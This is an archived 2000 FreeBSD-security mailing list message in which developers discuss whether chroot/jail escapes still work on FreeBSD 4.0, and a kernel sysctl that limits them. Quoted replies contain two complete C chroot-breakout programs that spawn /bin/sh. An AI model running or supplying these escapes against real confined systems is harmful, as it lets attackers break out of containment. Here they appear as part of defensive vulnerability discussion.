From owner-freebsd-security Thu May 18 14:47:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 3EFB937BA9E for ; Thu, 18 May 2000 14:47:43 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.3) with ESMTP id XAA02782; Thu, 18 May 2000 23:20:41 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Harold Gutch Cc: Cy Schubert - ITSD Open Systems Group , Paul Hart , Adam Laurie , freebsd-security@freebsd.org Subject: Re: envy.vuurwerk.nl daily run output In-reply-to: Your message of "Fri, 12 May 2000 20:06:19 +0200." <20000512200619.A14067@foobar.franken.de> Date: Thu, 18 May 2000 23:20:41 +0200 Message-ID: <2780.958684841@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Please check the action of the "kern.chroot_allow_open_directories" for a deeper explanation of this one. It is not set to zero for fear of compatibility issues. Maybe we should set it to zero in -current to see if there are any such issues. Poul-Henning In message <20000512200619.A14067@foobar.franken.de>, Harold Gutch writes: >On Fri, May 12, 2000 at 06:19:06AM -0700, Cy Schubert - ITSD Open Systems Group wrote: >> chrooted environment including jail, however testing the break out of >> jail exploit (good thing I tested before I spoke), which BTW worked on >> FreeBSD-3 and numerous other platforms including Linux, Solaris, and >> Tru64-UNIX, appears to no longer work under 4.0 -- which is a good >> thing! When did the FreeBSD chroot(2) get fixed? >> >> Once again FreeBSD leads the way. >> >> Following is the break-out-of-jail code. >> >> #include >> #include >> >> const char *shell = "/bin/sh"; >> const char *lowerdir = "/tmp"; >> >> int main() { >> int i; >> >> assert(chdir("/") != -1); >> assert(chroot(lowerdir) != -1); >> for (i = 0; i < 32; i++) >> assert(chdir("..") != -1); >> assert(chroot(".") != -1); >> >> assert(execl(shell, shell, NULL) != -1); >> }; > > >What about the "other" chroot-breakout, does it still work under >FreeBSD 4.0? >Here's the breakout-code modulo checks wether /tmp exists etc. > >#include >#include >#include > >int main(int argc, char *argv[]) >{ > int handle, i; > > handle = open("/", O_RDONLY); > chroot("/tmp"); > chdir("/"); > fchdir(handle); > for (i = 0; i < 32; i++) > chdir(".."); > chroot("."); > chdir("/"); > system("/bin/sh"); > > return 0; >} > >bye, > Harold > >-- >Someone should do a study to find out how many human life spans have >been lost waiting for NT to reboot. > Ken Deboy on Dec 24 1999 in comp.unix.bsd.freebsd.misc > -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD coreteam member | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message